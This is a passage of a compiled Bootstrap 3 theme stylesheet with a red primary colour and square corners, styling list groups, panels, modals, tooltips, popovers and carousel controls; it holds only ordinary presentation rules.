.media-object.img-thumbnail {
  max-width: none;
}
.media-right,
.media > .pull-right {
  padding-left: 10px;
}
.media-left,
.media > .pull-left {
  padding-right: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-left: 0;
  list-style: none;
}
.list-group {
  padding-left: 0;
  margin-bottom: 20px;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #eeeeee;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #cc0000;
  border-color: #cc0000;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #ff9999;
}
a.list-group-item,
button.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading,
button.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
button.list-group-item:hover,
a.list-group-item:focus,
button.list-group-item:focus {
  color: #555555;
  text-decoration: none;
  background-color: #f5f5f5;
}
button.list-group-item {
  width: 100%;
  text-align: left;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success,
button.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading,
button.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
button.list-group-item-success:hover,
a.list-group-item-success:focus,
button.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
button.list-group-item-success.active,
a.list-group-item-success.active:hover,
button.list-group-item-success.active:hover,
a.list-group-item-success.active:focus,
button.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info,
button.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading,
button.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
button.list-group-item-info:hover,
a.list-group-item-info:focus,
button.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
button.list-group-item-info.active,
a.list-group-item-info.active:hover,
button.list-group-item-info.active:hover,
a.list-group-item-info.active:focus,
button.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning,
button.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading,
button.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
button.list-group-item-warning:hover,
a.list-group-item-warning:focus,
button.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
button.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
button.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus,
button.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger,
button.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading,
button.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
button.list-group-item-danger:hover,
a.list-group-item-danger:focus,
button.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
button.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
button.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus,
button.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .panel-heading + .panel-collapse > .list-group .list-group-item:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-right: 15px;
  padding-left: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-right-radius: -1;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-right-radius: -1;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  margin-bottom: 0;
  border: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #cc0000;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #cc0000;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #cc0000;
}
.panel-primary > .panel-heading .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #cc0000;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0;
}
.well-sm {
  padding: 9px;
  border-radius: 0;
}
.close {
  float: right;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  filter: alpha(opacity=20);
  opacity: 0.2;
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  filter: alpha(opacity=50);
  opacity: 0.5;
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
  appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  display: none;
  overflow: hidden;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: right;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-bottom: 0;
  margin-left: 5px;
}
.modal-footer .btn-group .btn + .btn {
  margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-left: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 12px;
  filter: alpha(opacity=0);
  opacity: 0;
}
.tooltip.in {
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.tooltip.top {
  padding: 5px 0;
  margin-top: -3px;
}
.tooltip.right {
  padding: 0 5px;
  margin-left: 3px;
}
.tooltip.bottom {
  padding: 5px 0;
  margin-top: 3px;
}
.tooltip.left {
  padding: 0 5px;
  margin-left: -3px;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  right: 5px;
  bottom: 0;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  left: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  background-color: #000000;
  border-radius: 0;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 14px;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-left: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-left: -10px;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow:after {
  content: "";
  border-width: 10px;
}
.popover.top > .arrow {
  bottom: -11px;
  left: 50%;
  margin-left: -11px;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  border-bottom-width: 0;
}
.popover.top > .arrow:after {
  bottom: 1px;
  margin-left: -10px;
  content: " ";
  border-top-color: #ffffff;
  border-bottom-width: 0;
}
.popover.right > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
  border-left-width: 0;
}
.popover.right > .arrow:after {
  bottom: -10px;
  left: 1px;
  content: " ";
  border-right-color: #ffffff;
  border-left-width: 0;
}
.popover.bottom > .arrow {
  top: -11px;
  left: 50%;
  margin-left: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}
.popover.bottom > .arrow:after {
  top: 1px;
  margin-left: -10px;
  content: " ";
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  right: 1px;
  bottom: -10px;
  content: " ";
  border-right-width: 0;
  border-left-color: #ffffff;
}
.popover-title {
  padding: 8px 14px;
  margin: 0;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1 -1 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}
.carousel-inner > .item {
  position: relative;
  display: none;
  -webkit-transition: 0.6s ease-in-out left;
  -o-transition: 0.6s ease-in-out left;
  transition: 0.6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000px;
    -moz-perspective: 1000px;
    perspective: 1000px;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    left: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  left: 100%;
}
.carousel-inner > .prev {
  left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  left: 0;
}
.carousel-inner > .active.left {
  left: -100%;
}
.carousel-inner > .active.right {
  left: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  width: 15%;
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
  background-color: rgba(0, 0, 0, 0);
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control.right {
  right: 0;
  left: auto;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control:hover,
.carousel-control:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
  margin-top: -10px;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  font-family: serif;
  line-height: 1;
}
.carousel-control .icon-prev:before {
  content: "\2039";
}
.carousel-control .icon-next:before {
  content: "\203a";
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  left: 50%;
  z-index: 15;
  width: 60%;
  padding-left: 0;
  margin-left: -30%;
  text-align: center;
  list-style: none;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
  border: 1px solid #ffffff;
  border-radius: 10px;
}
.carousel-indicators .active {
  width: 12px;
  height: 12px;
  margin: 0;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  right: 15%;
  bottom: 20px;
  left: 15%;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
